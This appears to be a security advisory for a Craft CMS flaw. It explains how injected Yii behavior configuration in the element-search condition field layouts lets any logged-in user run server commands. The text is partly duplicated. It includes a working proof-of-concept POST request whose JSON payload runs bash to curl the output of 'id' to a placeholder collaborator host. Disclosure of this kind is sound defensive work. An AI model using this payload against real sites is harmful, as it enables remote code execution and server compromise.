We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.
The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.
This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json
{
"elementType": "craft\\elements\\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\\elements\\conditions\\ElementCondition",
"elementType": "craft\\elements\\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\\Readline\\Hoa\\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/`id`\](https://yourcollaboratorservergoeshere/%60id%60/)""
}
]
},
"on *": "self::beforeSave"
}
]
}
}
precicom-vincent-tl Finder
We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.
This is largely a continuation of GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.
The request-controlled condition field layouts data is converted into a live FieldLayout object without a
Component::cleanseConfig()boundary. Because Craft configures models beforeparent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
We were able to reproduce the attack by issuing a POST request to
/admin/actions/element-search/searchwith the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that samebeforeAction()path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:References
ab85ca7